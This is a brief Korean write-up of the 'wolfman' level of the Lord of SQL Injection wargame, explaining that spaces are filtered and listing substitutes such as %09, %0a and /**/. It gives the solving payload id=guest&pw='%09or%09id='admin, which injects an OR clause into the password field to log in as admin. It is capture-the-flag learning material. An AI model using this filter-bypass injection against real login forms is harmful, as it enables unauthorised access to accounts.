[LOS] wolfman

id가 admin이면 풀린다.

공백문자가 필터링 되어 있다.

 

공백문자를 필터링되어 있을 경우

%09, %0a, %0b, %0c, %0d, %a0, /**/ 를 사용하면 된다.

 

따라서 php뒤에 다음과 같이 써주면 된다.

 

id=guest&pw='%09or%09id='admin

 

풀렸다.